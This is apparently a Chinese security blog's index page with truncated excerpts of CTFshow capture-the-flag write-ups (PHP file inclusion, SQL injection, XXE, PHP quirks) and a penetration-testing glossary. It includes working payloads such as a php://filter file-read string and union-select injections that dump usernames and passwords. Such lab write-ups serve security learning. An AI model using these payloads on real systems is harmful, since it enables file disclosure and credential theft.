No title
java编译过程:
Java源代码 ——(编译)——> Java字节码 ——(解释器)——> 机器码
Java源代码 ——(编译器 )——> jvm可执行的Java字节码 ——(jvm解释器) ——> 机器可执行的二进制机器码 ——>程序运行
采用字节码的好处:高效、可移植性高
No title
web7812345<?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); }
include文件包含,payload:?file=php://filter/convert.base64-encode/resource=flag.php
web7912345<?php if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php", "???", $file); include($file); }else{ highlight_file(__FILE__); }
过滤了php,那么就 ...
No title
web171比较常规的题目不做讲解了,这里给出payload
123456# 查数据库payload = "-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+"# 查列名payload="-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user' --+"# 查flagpayload="-1'union select id,username,password from ctfshow_user --+"
web172第二题,首先从题目提示当中看出查询的数据不包含flag,并且给出了数据库是ctfshow_user2
12//拼接sql语句查找指定ID用户$ ...
No title
什么是XXE?
XXE就是XML外部实体注入。当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。
入门可以看看 XXE漏洞学习、一篇文章带你深入理解漏洞之 XXE 漏洞
[toc]
web373php
12345678910111213141516171819202122232425262728<?php/*# -*- coding: utf-8 -*-# @Author: h1xa# @Date: 2021-01-07 12:59:52# @Last Modified by: h1xa# @Last Modified time: 2021-01-07 13:36:47# @email: h1xa@ctfer.com# @link: https://ctfer.com*/error_reporting(0);// 允许加载外部实体libxml_disable_entity_loader(false);$xmlfile = file_get_contents('php://input');if ...
No title
PHP特性web89123456789101112131415<?phpinclude("flag.php");highlight_file(__FILE__);if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; }}?>
intval函数(获取变量的整数型):如果他的值为一个数组,只要数组里面有值,那么不论值的数量,返回值都为1,空数组则返回0
preg_match() 函数
利用数组绕过正则匹配,使其返回值发生错误而为false
payload:?num[]=1
web9012345678910111213include("flag.php&q ...
No title
知识点
名词解释-渗透测试-漏洞&攻击&后门&代码&专业词
必备技能-操作系统-用途&命令&权限&用户&防火墙
必备技能-文件下载-缘由&场景&使用-提权&后渗透
必备技能-反弹命令-缘由&场景&使用-提权&后渗透
前后端,POC/EXP,Payload/Shellcode,后门/Webshell,木马/病毒, 反弹,回显,跳板,黑白盒测试,暴力破解,社会工程学,撞库,ATT&CK 等参考:https://www.cnblogs.com/sunny11/p/13583083.htmlhttps://forum.ywhack.com/bountytips.php?downloadhttps://forum.ywhack.com/reverse-shell/https://blog.csdn.net/weixin_43303273/article/details/83029138
12345678910111213141516171819202122232425 ...
SQL注入总结
渗透测试SQL注入总结
SQL注入精讲
渗透测试SQL精讲